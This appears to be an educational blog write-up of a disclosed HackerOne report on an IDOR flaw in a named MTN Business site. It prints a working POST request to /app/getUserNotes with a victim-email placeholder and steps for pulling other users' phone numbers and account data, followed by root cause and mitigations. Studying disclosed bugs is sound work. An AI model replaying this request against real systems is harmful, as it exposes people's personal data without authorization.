Critical IDOR Vulnerability leads to PII leakage

Disclaimer : I came across this bug report on HackerOne (not my own) and I wanted to clarify and showcase it for educational reasons.

Source : https://hackerone.com/reports/1773609

Overview
In this write-up, I will demonstrate how an Insecure Direct Object Reference (IDOR) vulnerability in the MTN Business website (https://mtnmobad.mtnbusiness.com.ng) allows an attacker to access sensitive user information, such as phone numbers and account details, without authorization. This bug exposes Personally Identifiable Information (PII), which is critical for user privacy.

Vulnerability Details

• Type: IDOR (Insecure Direct Object Reference)
• Endpoint: /app/getUserNotes
• Method: POST request with JSON payload

Understanding the Vulnerability

An IDOR vulnerability occurs when an application improperly exposes objects based on user-supplied input without verifying whether the requester has permission to access them. In this case, the application allows unauthorized access to user data when only an email address is provided.

Vulnerable Request Example

POST /app/getUserNotes HTTP/1.1
Host: mtnmobad.mtnbusiness.com.ng
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 195
Origin: https://mtnmobad.mtnbusiness.com.ng
Connection: close
Referer: https://mtnmobad.mtnbusiness.com.ng/
Cookie: G_ENABLED_IDPS=google; connect.sid=s%3ATYGgZ8wqgEinB9zX0d7-OdZyt2jXa_ev.hQw0FOvTD5bB159jCtqA%2BXv7z%2FHROL%2B2vSS6mNK%2FqVg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{
  "params": {
    "updates": [
      {
        "param": "user",
        "value": {
          "userEmail": "<PUT_VICTIM_EMAIL_HERE>"
        },
        "op": "a"
      }
    ],
    "cloneFrom": {
      "updates": null,
      "cloneFrom": null,
      "encoder": {},
      "map": null
    },
    "encoder": {},
    "map": null
  }
}

Explanation: By modifying the userEmail parameter, an attacker can input any valid email address they know or guess. The server returns sensitive account information for that email without checking whether the request is authorized.

Exploitation Steps

Here’s how the vulnerability can be exploited step by step:

1. Log In and Intercept the Request

• Log in with a legitimate user account to access the application.
• Use tools like Burp Suite or Postman to intercept the POST request to /app/getUserNotes when fetching user account details.

2. Modify the Request

• Replace the value of "userEmail" with the email address of another user (e.g., victim@example.com).
• Send the modified request.

3. Observe the Response

• If successful, the server responds with the personal information associated with the victim’s email, such as:
• Phone number
• Account information
• This data is exposed to the attacker without any verification of identity.

Root Cause Analysis

The root cause of the vulnerability is the lack of proper access control:

• The server trusts the userEmail parameter without verifying that the requester is authorized to access the account details tied to that email.
• The system does not validate whether the authenticated user (identified by the session cookie) is the actual owner of the email provided.

Mitigation Strategies

To prevent this kind of vulnerability, the development team should implement the following solutions:

1. Authorization Checks:

• Validate that the email parameter matches the authenticated user’s session or token.
• Ensure the requester has the appropriate permissions to access the provided email’s data.

2. Use of Unique Identifiers:

• Instead of using emails, the application should use non-guessable, unique user IDs tied to the session to fetch user data.

3. Rate Limiting and Monitoring:

• Implement rate limiting to prevent attackers from brute-forcing or enumerating email addresses.
• Monitor logs for abnormal access patterns indicating possible exploitation attempts.

Impact

The vulnerability exposes Personally Identifiable Information (PII) and sensitive user data, violating privacy regulations like GDPR. If exploited, attackers can harvest personal details of multiple users, potentially leading to:

• Phishing attacks
• Identity theft
• Financial fraud